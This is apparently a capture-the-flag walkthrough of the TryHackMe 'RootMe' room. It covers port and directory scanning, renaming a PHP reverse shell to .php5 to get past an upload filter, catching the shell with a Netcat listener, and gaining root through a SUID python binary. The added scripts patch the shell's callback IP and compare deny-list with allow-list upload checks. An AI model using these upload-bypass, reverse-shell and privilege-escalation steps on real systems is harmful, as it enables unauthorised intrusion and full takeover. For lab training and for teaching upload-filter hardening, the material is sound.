RootMe

Task 2: Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (-Pn) so nmap skips host discovery and scans the target even if it does not answer ping:

nmap -Pn 10.10.166.228

We found 2 open ports, which is the answer to the first question.

Detailed Nmap Scan :

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 22,80

  • (-oN nmap): Saving the output in normal format to a file called nmap

nmap -sV -sC -p 22,80 -oN nmap 10.10.166.228

Port 80 is running Apache 2.4.29 and port 22 is running SSH. These are the answers to the next two questions.
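The two scans above are really one step feeding the next: the ports that come back open from the quick -Pn scan are exactly the ones passed to -p in the detailed scan. The script below is an added example (not part of the original write-up) that automates that hand-off: a small parser turns nmap's normal output into the "22,80" list, and scan_target runs both scans in sequence. The nmap output embedded in it is a constructed sample, not real output from the room, and the file names nmap_quick and nmap are my own choice.

```bash
#!/bin/bash
# Added example (not from the original write-up): turn the quick "-Pn" scan
# into the port list for the detailed "-sV -sC" scan, so the second command
# never has to be typed by hand. Assumes nmap's default normal (-oN) output.

# Read nmap normal output on stdin, print open TCP ports as "22,80".
open_ports() {
    # Lines look like "22/tcp   open  ssh"; keep the number before "/tcp".
    # Filtered/closed ports do not match and are dropped.
    grep -E '^[0-9]+/tcp +open' | cut -d/ -f1 | paste -sd, -
}

# Full recon of one host: discovery scan without ping, then version and
# default-script scan of exactly the ports that came back open.
# Output is kept in nmap_quick and nmap (file names are this example's choice).
scan_target() {
    target="$1"
    nmap -Pn -oN nmap_quick "$target" >/dev/null
    ports=$(open_ports < nmap_quick)
    if [ -z "$ports" ]; then
        echo "no open TCP ports found on $target" >&2
        return 1
    fi
    echo "open ports: $ports"
    nmap -sV -sC -p "$ports" -oN nmap "$target"
}

# Constructed sample of a quick scan's output, used to exercise the parser
# offline (it is not real scan output from the room).
SAMPLE_SCAN='# Nmap 7.80 scan initiated
Nmap scan report for 10.10.166.228
Host is up (0.050s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE
22/tcp open     ssh
25/tcp filtered smtp
80/tcp open     http
'

if [ $# -gt 0 ]; then
    scan_target "$1"
else
    echo "ports parsed from sample: $(printf '%s' "$SAMPLE_SCAN" | open_ports)"
fi
```

Run it as `./recon.sh 10.10.166.228` to scan a real target, or with no arguments to see the parser pick "22,80" out of the sample while ignoring the filtered port.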

To find hidden directories on the web server, we use Gobuster in directory brute-force (dir) mode.

Command Breakdown:

  • (-w): Specifying wordlist

  • (-u): Specifying URL

  • (-x): Specifying file extensions to try (optional; not used in the command below)

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.166.228

We find 2 interesting directories, /uploads/ and /panel/, and the answer for the last question of this task is /panel/.

Task 3: Getting a shell

The task says we need to find a form to upload a reverse shell. From the gobuster output we know there is a /uploads directory, which is presumably where uploaded files are stored. First, though, we need the upload page itself: it is in the /panel directory, and when we visit it we see a file upload form.

Now we have to see if we can upload a PHP reverse shell (pentestmonkey's php-reverse-shell).

First, edit the script as downloaded: change $ip to your TryHackMe VPN IP (the tun0 address) and $port to the port your Netcat listener will be listening on.

Once you have changed it, try uploading it.

It looks like PHP files are not allowed. The filter appears to check only the .php extension, so renaming the file to an alternative PHP extension, for example by adding a number (I'm adding 5), gets it past the check while the web server still executes it as PHP.

mv shell.php shell.php5

Now let's try uploading it.

It was uploaded. Now let's go to the uploads directory, where our reverse shell should be accessible.
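The bypass works because the form rejects the file by extension with a deny-list that only knows ".php", and a deny-list is only as good as its list. The script below is an added example (not code from the original write-up or from the room): prepare_shell patches $ip and $port into the pentestmonkey script with sed instead of hand-editing, and two small filter functions reconstruct the behaviour seen on the box, a deny-list that blocks only "php" versus the allow-list of image extensions a hardened upload form would use. The filters are my reconstruction of the observed behaviour, not the server's real code, and the PHP header embedded in the script is a constructed stand-in for the top of php-reverse-shell.php; 10.8.0.1 and 1234 are placeholder listener values.

```bash
#!/bin/bash
# Added example (not from the original write-up). Two things are shown:
#  1. prepare_shell: patch the pentestmonkey php-reverse-shell's $ip/$port
#     with sed, then write the copy under the bypass name.
#  2. why the rename works: a deny-list that only knows ".php" lets
#     "shell.php5" (and "shell.PHP") through, while an allow-list of image
#     extensions does not.
# The filter functions are a reconstruction of the observed behaviour, not
# the room's actual server-side code.

# Patch listener address and port into a copy of the reverse shell.
# usage: prepare_shell php-reverse-shell.php 10.8.0.1 1234 shell.php5
prepare_shell() {
    src="$1" ip="$2" port="$3" out="$4"
    # pentestmonkey's script carries these two lines near the top:
    #   $ip = '127.0.0.1';  // CHANGE THIS
    #   $port = 1234;       // CHANGE THIS
    sed -e "s/^\\\$ip = '[^']*';/\$ip = '$ip';/" \
        -e "s/^\\\$port = [0-9]*;/\$port = $port;/" "$src" > "$out"
}

# Deny-list check as the upload form appears to do it: reject only "php".
# Returns 0 (allowed) or 1 (blocked).
denylist_allows() {
    ext="${1##*.}"
    case "$ext" in
        php) return 1 ;;
        *)   return 0 ;;
    esac
}

# Allow-list check a hardened form would use: only image extensions,
# compared case-insensitively, and the name must actually have an extension.
allowlist_allows() {
    name="$1"
    case "$name" in
        *.*) ;;
        *) return 1 ;;
    esac
    ext=$(printf '%s' "${name##*.}" | tr 'A-Z' 'a-z')
    case "$ext" in
        png|jpg|jpeg|gif) return 0 ;;
        *)                return 1 ;;
    esac
}

# Constructed stand-in for the top of php-reverse-shell.php (not the real file).
SAMPLE_SHELL="<?php
set_time_limit (0);
\$VERSION = \"1.0\";
\$ip = '127.0.0.1';  // CHANGE THIS
\$port = 1234;       // CHANGE THIS
"

demo() {
    tmp=$(mktemp)
    printf '%s' "$SAMPLE_SHELL" > "$tmp"
    prepare_shell "$tmp" 10.8.0.1 1234 "$tmp.php5"
    grep -E '^\$(ip|port) ' "$tmp.php5"
    for f in shell.php shell.php5 shell.phtml shell.PHP avatar.png; do
        denylist_allows "$f" && d=allowed || d=blocked
        allowlist_allows "$f" && a=allowed || a=blocked
        printf '%-12s deny-list: %-8s allow-list: %s\n' "$f" "$d" "$a"
    done
    rm -f "$tmp" "$tmp.php5"
}
demo
```

The table the demo prints is the whole lesson: every name except shell.php sails past the deny-list, including shell.PHP, which differs only in case; the allow-list admits only avatar.png. Extension checks alone are still not enough on the server side, since the web server decides what to execute by its own handler configuration, but an allow-list at least removes the obvious rename trick.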

It is there, but before we click it we need to start a Netcat listener to catch the reverse shell:

nc -lvnp 1234

Once you click the shell.php5 link on the site, the server executes the script and you get a reverse shell on the listener.

You can now go and find user.txt, which is the answer to the question in this task. But first, let's stabilize our shell by spawning a proper TTY with Python:

python -c 'import pty; pty.spawn("/bin/bash")'

And to get access to the clear command, set the terminal type:

export TERM=xterm-color

If you are struggling to find the user.txt file, the find command locates it easily.

Command Breakdown:

  • find: The find command, which walks a directory tree and prints entries matching the given tests

  • /: Searching through all directories

  • -type: Specifying file type, in this case a file (f)

  • -name: Specifying the name of the file, in this case user.txt

  • 2>/dev/null: Sending all errors (file descriptor 2, stderr) to /dev/null, a device that discards anything written to it, so the permission-denied errors from directories we cannot read are hidden

find / -type f -name user.txt 2>/dev/null

Task 4: Privilege Escalation

The first question asks us to find files with the SUID permission bit set. We can find them with the following command:

Command Breakdown:

  • find: The find command, as before

  • /: Searching through all directories

  • -perm: Specifying permission bits; -u=s matches files whose owner has the set-user-ID bit, meaning the file runs with its owner's privileges (root, if owned by root) rather than the caller's

  • -type: Specifying file type, in this case a file (f)

  • 2>/dev/null: Sending all errors to /dev/null so the permission-denied messages do not clutter the output

find / -perm -u=s -type f 2>/dev/null

Looking through these, the one that catches my eye is /usr/bin/python, and that is the answer to the first question.

Since python is SUID root, we can look it up on GTFOBins and find commands that use it to escalate our privileges to root.

Use the second command from the SUID section, without the ./ prefix since python is already on the PATH, and you should get root:

python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

The -p flag makes sh keep the effective user ID inherited from the SUID binary instead of dropping back to the real one, so id now reports euid=0(root). Now you can find the final flag, which is also the final question in this room, in /root/, which you can access as root.
